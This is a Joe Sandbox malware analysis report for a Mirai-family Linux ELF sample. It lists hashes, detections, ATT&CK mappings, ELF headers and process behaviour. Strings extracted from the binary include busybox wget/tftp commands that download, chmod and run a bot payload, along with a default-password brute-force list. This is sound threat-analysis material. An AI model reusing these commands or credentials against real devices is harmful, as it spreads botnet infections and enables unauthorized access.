Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1530590
MD5:9fbcbec2482f6966fb801bd429348f97
SHA1:e271c718461839d42a935b2f026ac3e6f06c407e
SHA256:9d6ec4ee1096ec4c6d4e43d4ce4c28423a03cc327a0fcaf8b39b28553ae38e00
Tags:elfMiraiuser-abuse_ch
Infos:

Detection

Mirai
Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Deletes system log files
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1530590
Start date and time:2024-10-10 10:26:56 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 52s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal64.troj.evad.linELF@0/0@0/0
  • Skipping network analysis since amount of network traffic is too extensive
  • VT rate limit hit for: na.elf
Command:/tmp/na.elf
PID:5447
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB lEarNs nOthinG xd
Standard Error:
  • system is lnxubuntu20
  • na.elf (PID: 5447, Parent: 5374, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 5449, Parent: 5447)
    • na.elf New Fork (PID: 5451, Parent: 5447)
    • na.elf New Fork (PID: 5453, Parent: 5447)
      • na.elf New Fork (PID: 5455, Parent: 5453)
  • cleanup
SourceRuleDescriptionAuthorStrings
na.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: na.elfReversingLabs: Detection: 28%
    Source: na.elfString: ash|login|wget|curl|tftp|ntpdate
    Source: na.elfString: N^Nu/proc/|ash|login|wget|curl|tftp|ntpdate/fdsocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//proc/net/tcp/bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet/bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t\x%02xsh
    Source: /tmp/na.elf (PID: 5447)Socket: 127.0.0.1:1234Jump to behavior
    Source: na.elfString found in binary or memory: http://%d.%d.%d.%d/la.bot.%s
    Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
    Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
    Source: Initial sampleString containing 'busybox' found: /bin/busybox BOT
    Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
    Source: Initial sampleString containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
    Source: Initial sampleString containing 'busybox' found: /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox BOT
    Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
    Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
    Source: Initial sampleString containing 'busybox' found: N^Nu/proc/|ash|login|wget|curl|tftp|ntpdate/fdsocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//proc/net/tcp/bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet/bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t\x%02xsh
    Source: Initial sampleString containing 'busybox' found: /bin/busybox BOTbuf = %s
    Source: Initial sampleString containing 'busybox' found: >%st && cd %s && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
    Source: Initial sampleString containing 'busybox' found: armx86_64mipsmipselsuperhpowerpcsparcget: applet not foundftp: applet not foundcho: applet not found>>retrieve/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
    Source: Initial sampleString containing potential weak password found: service
    Source: Initial sampleString containing potential weak password found: guest
    Source: Initial sampleString containing potential weak password found: admin
    Source: Initial sampleString containing potential weak password found: 123456
    Source: Initial sampleString containing potential weak password found: default
    Source: Initial sampleString containing potential weak password found: 54321
    Source: Initial sampleString containing potential weak password found: 12345678
    Source: Initial sampleString containing potential weak password found: 654321
    Source: Initial sampleString containing potential weak password found: support
    Source: Initial sampleString containing potential weak password found: password
    Source: Initial sampleString containing potential weak password found: supervisor
    Source: Initial sampleString containing potential weak password found: administrator
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: classification engineClassification label: mal64.troj.evad.linELF@0/0@0/0

    Data Obfuscation

    barindex
    Source: /tmp/na.elf (PID: 5451)File: /etc/configJump to behavior
    Source: /tmp/na.elf (PID: 5451)Directory: /root/.cacheJump to behavior
    Source: /tmp/na.elf (PID: 5451)Directory: /root/.sshJump to behavior
    Source: /tmp/na.elf (PID: 5451)Directory: /root/.configJump to behavior
    Source: /tmp/na.elf (PID: 5451)Directory: /root/.localJump to behavior
    Source: /tmp/na.elf (PID: 5451)Directory: /tmp/.X11-unixJump to behavior
    Source: /tmp/na.elf (PID: 5451)Directory: /tmp/.Test-unixJump to behavior
    Source: /tmp/na.elf (PID: 5451)Directory: /tmp/.font-unixJump to behavior
    Source: /tmp/na.elf (PID: 5451)Directory: /tmp/.ICE-unixJump to behavior
    Source: /tmp/na.elf (PID: 5451)Directory: /tmp/.XIM-unixJump to behavior
    Source: /tmp/na.elf (PID: 5451)Directory: /etc/.javaJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: /tmp/na.elf (PID: 5451)Log files deleted: /var/log/kern.logJump to behavior
    Source: /tmp/na.elf (PID: 5447)Queries kernel information via 'uname': Jump to behavior
    Source: na.elf, 5447.1.00007ffc31998000.00007ffc319b9000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-m68k/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf
    Source: na.elf, 5447.1.00007ffc31998000.00007ffc319b9000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
    Source: na.elf, 5447.1.0000561c1427c000.0000561c14301000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
    Source: na.elf, 5447.1.0000561c1427c000.0000561c14301000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/m68k

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: na.elf, type: SAMPLE

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: na.elf, type: SAMPLE
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    Path Interception1
    Hidden Files and Directories
    1
    Brute Force
    11
    Security Software Discovery
    Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Indicator Removal
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1530590 Sample: na.elf Startdate: 10/10/2024 Architecture: LINUX Score: 64 18 Multi AV Scanner detection for submitted file 2->18 20 Yara detected Mirai 2->20 7 na.elf 2->7         started        process3 process4 9 na.elf 7->9         started        12 na.elf 7->12         started        14 na.elf 7->14         started        signatures5 22 Sample tries to access files in /etc/config/ (typical for OpenWRT routers) 9->22 24 Deletes system log files 9->24 16 na.elf 12->16         started        process6
    SourceDetectionScannerLabelLink
    na.elf29%ReversingLabsLinux.Backdoor.Gafgyt
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http://%d.%d.%d.%d/la.bot.%sna.elffalse
      unknown
      No contacted IP infos
      No context
      No context
      No context
      No context
      No context
      No created / dropped files found
      File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
      Entropy (8bit):5.4551128125820805
      TrID:
      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
      File name:na.elf
      File size:104'072 bytes
      MD5:9fbcbec2482f6966fb801bd429348f97
      SHA1:e271c718461839d42a935b2f026ac3e6f06c407e
      SHA256:9d6ec4ee1096ec4c6d4e43d4ce4c28423a03cc327a0fcaf8b39b28553ae38e00
      SHA512:48cf546ec5969205af8bc357f9b2b6ff07bfcdc5d638560127c2d7005d3878f81d963275f732760988c92a9b83aa22f8db3335718f8933cbc36befd37a0b29a2
      SSDEEP:1536:iHPbUHbHIFGixjg5dcZ8I+9X0/Uwqsofb+X3Fts5LcjN53r:MAHrAjg5dcodpNTfCkLcjH
      TLSH:A9A34BD6B800ED7DF80BC3378443491AB231F3619A422B366753B977AD361A43E67E85
      File Content Preview:.ELF.......................D...4.........4. ...(......................*P..*P...... .......*P..JP..JP..j8.......... .dt.Q............................NV..a....da....HN^NuNV..J9....f>"y..Jh QJ.g.X.#...JhN."y..Jh QJ.f.A.....J.g.Hy..*LN.X.........N^NuNV..N^NuN

      ELF header

      Class:ELF32
      Data:2's complement, big endian
      Version:1 (current)
      Machine:MC68000
      Version Number:0x1
      Type:EXEC (Executable file)
      OS/ABI:UNIX - System V
      ABI Version:0
      Entry Point Address:0x80000144
      Flags:0x0
      ELF Header Size:52
      Program Header Offset:52
      Program Header Size:32
      Number of Program Headers:3
      Section Header Offset:103632
      Section Header Size:40
      Number of Section Headers:11
      Header String Table Index:10
      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
      NULL0x00x00x00x00x0000
      .initPROGBITS0x800000940x940x140x00x6AX002
      .textPROGBITS0x800000a80xa80x10b720x00x6AX004
      .finiPROGBITS0x80010c1a0x10c1a0xe0x00x6AX002
      .rodataPROGBITS0x80010c280x10c280x1e220x00x2A002
      .eh_framePROGBITS0x80012a4c0x12a4c0x40x00x2A004
      .ctorsPROGBITS0x80014a500x12a500x80x00x3WA004
      .dtorsPROGBITS0x80014a580x12a580x80x00x3WA004
      .dataPROGBITS0x80014a640x12a640x6a240x00x3WA004
      .bssNOBITS0x8001b4880x194880x628c0x00x3WA004
      .shstrtabSTRTAB0x00x194880x480x00x0001
      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
      LOAD0x00x800000000x800000000x12a500x12a506.31210x5R E0x2000.init .text .fini .rodata .eh_frame
      LOAD0x12a500x80014a500x80014a500x6a380xccc41.57580x6RW 0x2000.ctors .dtors .data .bss
      GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
      Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

      System Behavior

      Start time (UTC):08:27:43
      Start date (UTC):10/10/2024
      Path:/tmp/na.elf
      Arguments:/tmp/na.elf
      File size:4463432 bytes
      MD5 hash:cd177594338c77b895ae27c33f8f86cc

      Start time (UTC):08:27:44
      Start date (UTC):10/10/2024
      Path:/tmp/na.elf
      Arguments:-
      File size:4463432 bytes
      MD5 hash:cd177594338c77b895ae27c33f8f86cc

      Start time (UTC):08:27:44
      Start date (UTC):10/10/2024
      Path:/tmp/na.elf
      Arguments:-
      File size:4463432 bytes
      MD5 hash:cd177594338c77b895ae27c33f8f86cc

      Start time (UTC):08:27:44
      Start date (UTC):10/10/2024
      Path:/tmp/na.elf
      Arguments:-
      File size:4463432 bytes
      MD5 hash:cd177594338c77b895ae27c33f8f86cc

      Start time (UTC):08:27:44
      Start date (UTC):10/10/2024
      Path:/tmp/na.elf
      Arguments:-
      File size:4463432 bytes
      MD5 hash:cd177594338c77b895ae27c33f8f86cc